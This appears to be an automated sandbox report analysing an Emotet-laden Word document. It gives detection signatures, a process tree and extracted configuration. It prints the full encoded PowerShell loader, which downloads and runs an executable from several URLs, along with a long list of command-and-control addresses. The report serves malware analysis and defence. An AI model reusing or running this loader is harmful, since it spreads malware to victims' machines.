Loading ...

Play interactive tourEdit tour

Analysis Report #U306b#U4fee.doc

Overview

General Information

Sample Name:#U306b#U4fee.doc
Analysis ID:289482
MD5:4587fbf7ca13256c6c5af0d73e5b0d2d
SHA1:8b7615d14b88ca905430641653ad541c0fd09e50
SHA256:cef0a21256e2c9bb654f4f7fd0454fc6dc1795f3aa95862003eaa9e5c144ab42

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2456 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 1552 cmdline: POWeRsHeLL -ENCOD JABHAGcAbQB5ADMAeAByAD0AKAAoACcASgAnACsAJwB1AHEAawAnACkAKwAoACcANwBoACcAKwAnAG8AJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAUwBlAHIAUAByAG8ARgBJAGwAZQBcAGEAOAA2ADIASAAxAG4AXABZAE4AUABuAFcAawBWAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAEUAYwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAHIASQB0AGAAWQBgAFAAUgBgAG8AYABUAGAAbwBjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAsACAAdAAnACkAKwAnAGwAcwAnACsAJwAxACcAKwAoACcAMQAsACcAKwAnACAAJwApACsAKAAnAHQAbAAnACsAJwBzACcAKQApADsAJABFADYANABfAGQAegA2ACAAPQAgACgAKAAnAEoAbAA5ACcAKwAnADkAJwApACsAJwB0ACcAKwAnAGkAJwApADsAJABDAGoANQBzAHYAMABpAD0AKAAoACcAWABrACcAKwAnAHAAMQA4ACcAKQArACcAbQAnACsAJwBnACcAKQA7ACQAVgB3AGoAcAAwAG4AdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBBADgANgAnACsAKAAnADIAaAAnACsAJwAxACcAKQArACcAbgB7ACcAKwAnADAAfQBZAG4AcABuACcAKwAnAHcAawB2AHsAMAB9ACcAKQAtAEYAWwBjAGgAQQByAF0AOQAyACkAKwAkAEUANgA0AF8AZAB6ADYAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEoAcAB1AG4AeQBrAGMAPQAoACcAVABfACcAKwAoACcAbABfAGsAbQAnACsAJwB5ACcAKQApADsAJABUAGoAdgBmAGoAYgBiAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUAbgBUADsAJABSADAAMQB3AGYAegBnAD0AKAAoACcAaAB0AHQAcAAnACsAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAbQBhACcAKwAnAGcAJwApACsAKAAnAG4AdQAnACsAJwBzACcAKQArACcAZABjACcAKwAoACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8ATQAnACsAKAAnAFIALwAqACcAKwAnAGgAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAvACcAKQArACcAZABhACcAKwAoACcAdAB1AG0AbQAnACsAJwBhACcAKwAnAGMAaABpACcAKwAnAG4AJwApACsAJwBlACcAKwAoACcAcwAnACsAJwAuAGMAbwAnACkAKwAoACcAbQAnACsAJwAvAGEAcwAnACkAKwAoACcAcwAnACsAJwBlAHQAcwAvAHUAJwApACsAKAAnAC8AKgBoACcAKwAnAHQAdABwADoALwAnACkAKwAoACcALwBpAG0AJwArACcAbQAnACsAJwBpAGcAcgBhAHQAaQBvAG4AcQAnACsAJwB1AGUAJwArACcAcwB0ACcAKwAnAGkAbwAnACsAJwBuAC4AYwBvACcAKwAnAG0ALwAzAHgAXwBiAGUAJwArACcAYQBzAHQALwAnACkAKwAnAFQAJwArACgAJwB5ADkALwAnACsAJwAqAGgAJwApACsAKAAnAHQAdABwADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwAxADIAMgAnACkAKwAoACcALgAnACsAJwAxADEANwAuADQAJwApACsAJwA0ACcAKwAnAC4AJwArACgAJwA1ADkAJwArACcALwAnACkAKwAoACcAdwBvAHIAZABwAHIAJwArACcAZQAnACsAJwBzACcAKQArACcAcwAnACsAJwAvAGcAJwArACgAJwBTAC8AKgBoAHQAJwArACcAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwAzAC4AMgAnACsAJwAxACcAKQArACcAMgAuACcAKwAoACcAMQA5ADQALgAzACcAKwAnAC8AYwAnACsAJwB3AHMAYwB3ACcAKQArACcAaQAvACcAKwAnADYAJwArACcAdQAnACsAJwAvACoAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcAA6ACcAKwAnAC8AJwArACgAJwAvADQAMQAnACsAJwAuACcAKQArACgAJwA4ADkAJwArACcALgAnACkAKwAnADkAJwArACgAJwA0ACcAKwAnAC4AMwAwAC8AdwAnACkAKwAoACcAZQBiAC8AJwArACcAOAAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAnAHQAJwArACcAdAAnACsAKAAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvAHMAJwArACcAcgBrACcAKQArACcAcwAnACsAKAAnAG0AJwArACcAYQAnACsAJwBpAHMAdwAuACcAKQArACgAJwBvAHIAZwAnACsAJwAvAG0AJwArACcAYQAnACkAKwAnAG4AdQAnACsAJwBmAGEAJwArACcAYwB0ACcAKwAnAHUAcgAnACsAJwBlAHIAJwArACcALwAnACsAJwBoACcAKwAnAC8AJwApAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAXwBqAHAAOQBmADgAPQAoACcARAAnACsAKAAnAF8AJwArACcAdQBhAHIAJwApACsAJwByAHIAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQBpAGoAOQA1AG8AXwAgAGkAbgAgACQAUgAwADEAdwBmAHoAZwApAHsAdAByAHkAewAkAFQAagB2AGYAagBiAGIALgAiAEQAYABPAHcATgBsAE8AYABBAEQAYABGAGkAbABFACIAKAAkAFUAaQBqADkANQBvAF8ALAAgACQAVgB3AGoAcAAwAG4AdgApADsAJABFAGYAdQBzAF8ANgB0AD0AKAAoACcARQBrADIAJwArACcAdgB5ACcAKQArACcAagBrACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABWAHcAagBwADAAbgB2ACkALgAiAGwARQBuAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAxADAAMgAyACkAIAB7ACYAKAAnAEkAbgB2AG8AawAnACsAJwBlACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAFYAdwBqAHAAMABuAHYAKQA7ACQATwB6ADgAZAAzAGkAaQA9ACgAKAAnAEUAaQB5ADIAJwArACcAYwAnACkAKwAnAGMAagAnACkAOwBiAHIAZQBhAGsAOwAkAE4ANABlADMAZgA2AGcAPQAoACgAJwBMACcAKwAnAGkAeQBvACcAKQArACcAbAAnACsAJwAxADcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAG8ANwA0AHUAeQBwAD0AKAAnAEkAJwArACcAXwAnACsAKAAnADQAeAA2ACcAKwAnAGIAZAAnACkAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • Jl99ti.exe (PID: 2416 cmdline: 'C:\Users\user\A862h1n\Ynpnwkv\Jl99ti.exe' MD5: F16D3E8E83EC1C32F05870F75F97575F)
      • KBDYCC.exe (PID: 952 cmdline: C:\Windows\SysWOW64\wlanui\KBDYCC.exe MD5: F16D3E8E83EC1C32F05870F75F97575F)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["12.163.208.58:80", "45.33.35.74:8080", "87.106.253.248:8080", "192.241.146.84:8080", "190.115.18.139:8080", "65.36.62.20:80", "170.81.48.2:80", "83.169.21.32:7080", "185.232.182.218:80", "190.2.31.172:80", "77.106.157.34:8080", "82.230.1.24:80", "202.4.58.197:80", "201.213.177.139:80", "78.249.119.122:80", "123.51.47.18:80", "77.90.136.129:8080", "60.93.23.51:80", "152.169.22.67:80", "190.117.79.209:80", "60.108.144.104:443", "213.197.182.158:8080", "82.76.111.249:443", "209.236.123.42:8080", "190.24.243.186:80", "177.74.228.34:80", "191.182.6.118:80", "96.245.123.149:80", "61.197.92.216:80", "1.226.84.243:8080", "111.67.12.221:8080", "216.47.196.104:80", "185.94.252.27:443", "70.116.143.84:80", "187.162.248.237:80", "217.13.106.14:8080", "80.11.164.185:80", "35.143.99.174:80", "190.190.148.27:8080", "219.92.13.25:80", "70.32.115.157:8080", "96.227.52.8:443", "51.75.33.127:80", "95.9.180.128:80", "174.113.69.136:80", "119.106.216.84:80", "111.67.77.202:8080", "91.105.94.200:80", "178.250.54.208:8080", "98.13.75.196:80", "116.202.23.3:8080", "202.134.4.210:7080", "50.28.51.143:8080", "45.33.77.42:8080", "67.247.242.247:80", "137.74.106.111:7080", "85.214.26.7:8080", "181.30.61.163:443", "77.238.212.227:80", "185.215.227.107:443", "186.103.141.250:443", "50.121.220.50:80", "74.136.144.133:80", "104.131.41.185:8080", "61.92.159.208:8080", "104.131.103.37:8080", "51.15.7.189:80", "185.94.252.12:80", "94.176.234.118:443", "212.71.237.140:8080", "5.196.35.138:7080", "45.46.37.97:80", "70.32.84.74:8080", "199.203.62.165:80", "38.88.126.202:8080", "51.159.23.217:443", "155.186.0.121:80", "51.38.124.206:80", "181.129.96.162:8080", "64.201.88.132:80", "92.24.50.153:80", "189.2.177.210:443", "45.16.226.117:443", "76.168.54.203:80", "185.178.10.77:80", "220.109.145.69:80", "192.81.38.31:80", "68.183.170.114:8080", "177.73.0.98:443", "138.97.60.141:7080", "192.241.143.52:8080", "217.199.160.224:7080", "185.183.16.47:80", "177.129.17.170:443", "5.189.178.202:8080", "74.58.215.226:80", "51.255.165.160:8080", "12.162.84.2:8080", "149.202.72.142:7080", "87.106.46.107:8080", "188.135.15.49:80", "68.183.190.199:8080", "172.104.169.32:8080", "68.69.155.181:80", "72.47.248.48:7080", "12.163.208.58:80", "45.33.35.74:8080", "87.106.253.248:8080", "192.241.146.84:8080", "190.115.18.139:8080", "65.36.62.20:80", "170.81.48.2:80", "83.169.21.32:7080", "185.232.182.218:80", "190.2.31.172:80", "77.106.157.34:8080", "82.230.1.24:80", "202.4.58.197:80", "201.213.177.139:80", "78.249.119.122:80", "123.51.47.18:80", "77.90.136.129:8080", "60.93.23.51:80", "152.169.22.67:80", "190.117.79.209:80", "60.108.144.104:443", "213.197.182.158:8080", "82.76.111.249:443", "209.236.123.42:8080", "190.24.243.186:80", "177.74.228.34:80", "191.182.6.118:80", "96.245.123.149:80", "61.197.92.216:80", "1.226.84.243:8080", "111.67.12.221:8080", "216.47.196.104:80", "185.94.252.27:443", "70.116.143.84:80", "187.162.248.237:80", "217.13.106.14:8080", "80.11.164.185:80", "35.143.99.174:80", "190.190.148.27:8080", "219.92.13.25:80", "70.32.115.157:8080", "96.227.52.8:443", "51.75.33.127:80", "95.9.180.128:80", "174.113.69.136:80", "119.106.216.84:80", "111.67.77.202:8080", "91.105.94.200:80", "178.250.54.208:8080", "98.13.75.196:80", "116.202.23.3:8080", "202.134.4.210:7080", "50.28.51.143:8080", "45.33.77.42:8080", "67.247.242.247:80", "137.74.106.111:7080", "85.214.26.7:8080", "181.30.61.163:443", "77.238.212.227:80", "185.215.227.107:443", "186.103.141.250:443", "50.121.220.50:80", "74.136.144.133:80", "104.131.41.185:8080", "61.92.159.208:8080", "104.131.103.37:8080", "51.15.7.189:80", "185.94.252.12:80", "94.176.234.118:443", "212.71.237.140:8080", "5.196.35.138:7080", "45.46.37.97:80", "70.32.84.74:8080", "199.203.62.165:80", "38.88.126.202:8080", "51.159.23.217:443", "155.186.0.121:80", "51.38.124.206:80", "181.129.96.162:8080", "64.201.88.132:80", "92.24.50.153:80", "189.2.177.210:443", "45.16.226.117:443", "76.168.54.203:80", "185.178.10.77:80", "220.109.145.69:80", "192.81.38.31:80", "68.183.170.114:8080", "177.73.0.98:443", "138.97.60.141:7080", "192.241.143.52:8080", "217.199.160.224:7080", "185.183.16.47:80", "177.129.17.170:443", "5.189.178.202:8080", "74.58.215.226:80", "51.255.165.160:8080", "12.162.84.2:8080", "149.202.72.142:7080", "87.106.46.107:8080", "188.135.15.49:80", "68.183.190.199:8080", "172.104.169.32:8080", "68.69.155.181:80", "72.47.248.48:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2361348624.0000000000890000.00000002.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x5e724:$s1: POWeRsHeLL
00000005.00000002.2361155844.0000000000234000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.2108446565.00000000003C4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.2108292570.0000000000241000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000005.00000002.2361170833.0000000000251000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          Click to see the 2 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.Jl99ti.exe.240000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            5.2.KBDYCC.exe.250000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: #U306b#U4fee.docAvira: detected
              Found malware configurationShow sources
              Source: 00000005.00000002.2361155844.0000000000234000.00000004.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["12.163.208.58:80", "45.33.35.74:8080", "87.106.253.248:8080", "192.241.146.84:8080", "190.115.18.139:8080", "65.36.62.20:80", "170.81.48.2:80", "83.169.21.32:7080", "185.232.182.218:80", "190.2.31.172:80", "77.106.157.34:8080", "82.230.1.24:80", "202.4.58.197:80", "201.213.177.139:80", "78.249.119.122:80", "123.51.47.18:80", "77.90.136.129:8080", "60.93.23.51:80", "152.169.22.67:80", "190.117.79.209:80", "60.108.144.104:443", "213.197.182.158:8080", "82.76.111.249:443", "209.236.123.42:8080", "190.24.243.186:80", "177.74.228.34:80", "191.182.6.118:80", "96.245.123.149:80", "61.197.92.216:80", "1.226.84.243:8080", "111.67.12.221:8080", "216.47.196.104:80", "185.94.252.27:443", "70.116.143.84:80", "187.162.248.237:80", "217.13.106.14:8080", "80.11.164.185:80", "35.143.99.174:80", "190.190.148.27:8080", "219.92.13.25:80", "70.32.115.157:8080", "96.227.52.8:443", "51.75.33.127:80", "95.9.180.128:80", "174.113.69.136:80", "119.106.216.84:80", "111.67.77.202:8080", "91.105.94.200:80", "178.250.54.208:8080", "98.13.75.196:80", "116.202.23.3:8080", "202.134.4.210:7080", "50.28.51.143:8080", "45.33.77.42:8080", "67.247.242.247:80", "137.74.106.111:7080", "85.214.26.7:8080", "181.30.61.163:443", "77.238.212.227:80", "185.215.227.107:443", "186.103.141.250:443", "50.121.220.50:80", "74.136.144.133:80", "104.131.41.185:8080", "61.92.159.208:8080", "104.131.103.37:8080", "51.15.7.189:80", "185.94.252.12:80", "94.176.234.118:443", "212.71.237.140:8080", "5.196.35.138:7080", "45.46.37.97:80", "70.32.84.74:8080", "199.203.62.165:80", "38.88.126.202:8080", "51.159.23.217:443", "155.186.0.121:80", "51.38.124.206:80", "181.129.96.162:8080", "64.201.88.132:80", "92.24.50.153:80", "189.2.177.210:443", "45.16.226.117:443", "76.168.54.203:80", "185.178.10.77:80", "220.109.145.69:80", "192.81.38.31:80", "68.183.170.114:8080", "177.73.0.98:443", "138.97.60.141:7080", "192.241.143.52:8080", "217.199.160.224:7080", "185.183.16.47:80", "177.129.17.170:443", "5.189.178.202:8080", "74.58.215.226:80", "51.255.165.160:8080", "12.162.84.2:8080", "149.202.72.142:7080", "87.106.46.107:8080", "188.135.15.49:80", "68.183.190.199:8080", "172.104.169.32:8080", "68.69.155.181:80", "72.47.248.48:7080", "12.163.208.58:80", "45.33.35.74:8080", "87.106.253.248:8080", "192.241.146.84:8080", "190.115.18.139:8080", "65.36.62.20:80", "170.81.48.2:80", "83.169.21.32:7080", "185.232.182.218:80", "190.2.31.172:80", "77.106.157.34:8080", "82.230.1.24:80", "202.4.58.197:80", "201.213.177.139:80", "78.249.119.122:80", "123.51.47.18:80", "77.90.136.129:8080", "60.93.23.51:80", "152.169.22.67:80", "190.117.79.209:80", "60.108.144.104:443", "213.197.182.158:8080", "82.76.111.249:443", "209.236.123.42:8080", "190.24.243.186:80", "177.74.228.34:80", "191.182.6.118:80", "96.245.123.149:80", "61.197.92.216:80", "1.226.84.243:8080", "111.67.12.221:8080", "216.47.196.104:80", "185.94.252.27:443", "70.116.143.84:80", "187.162.248.237:80", "217.13.106.14:8080", "80.11.1<